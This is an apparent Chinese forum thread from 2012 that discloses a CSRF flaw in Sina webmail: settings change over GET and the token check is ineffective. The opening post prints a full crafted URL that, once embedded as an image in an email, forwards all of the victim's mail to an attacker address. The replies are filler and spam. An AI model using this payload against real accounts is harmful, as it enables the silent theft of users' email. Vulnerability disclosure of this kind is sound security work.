查看: 2361|回复: 25

新浪一处搞笑的CSRF,可以窃取用户邮件

[复制链接]
发表于 2012-12-18 02:07:05 | 显示全部楼层 |阅读模式
这几天,把SINA/SOHU/163通通CSRF了一遍。。国内普通不重视CSRF啊。为什么说这个搞笑呢? 因为形式上,这个链接是做了CSRF防范的,可事实上。。。

可以修改用户邮箱设置,而且可以使用GET方式。所以,攻击者可以直接<IMG SRC=xxx>发封邮件给对方,对方只要一看到这封邮件即刻中标。
我的demo中是把用户邮件全转到一个指定邮箱。。。当然,还可以干别的设置。所以,这个算相当高危的吧。。。
话说,你们那TOKEN......和尚头上的虱子啊.....

http://m1.mail.sina.com.cn/wa.php?a=update_setting&ListNum=20&forword_mode=3&signtext=%3CDIV%3E%26nbsp%3B%3CBR%3E%3C%2FDIV%3E&AddAddr=1&AddOut=1&ReplyInc=0&ReSubLang=CHE&autore=0&autofo=1&[email protected]&ShowMailSize=0&normalSign=0&vcardSign=0&weiboSign=0&autoreic=0&weibonotify=0&autoretext=&token=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

&#8203;
修复方案:
token啊token
发表于 2012-12-23 22:55:00 | 显示全部楼层
@,@..是什么意思呀?  
发表于 2012-12-24 19:04:44 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
7299189 该用户已被删除
发表于 2012-12-25 11:42:11 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
发表于 2012-12-27 02:11:38 | 显示全部楼层
哥最近喜欢上了顶贴,因为,如果帖子火了,那有哥的功劳。如果帖子被顶沉了....哥也会很有成就感...因为是哥搞沉的~~大家切记~不要迷恋哥~哥只是一个传说  
发表于 2012-12-28 07:33:40 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
发表于 2012-12-29 06:26:53 | 显示全部楼层
回帖是种美德.  
发表于 2012-12-31 21:49:42 | 显示全部楼层
天泽在线http://www.ak69v.com,升官发财  
发表于 2015-1-26 01:48:48 | 显示全部楼层
回个帖子支持一下!
发表于 2015-2-28 03:12:44 | 显示全部楼层
不错不错.,..我喜欢  
高级模式
B Color Image Link Quote Code Smilies

本版积分规则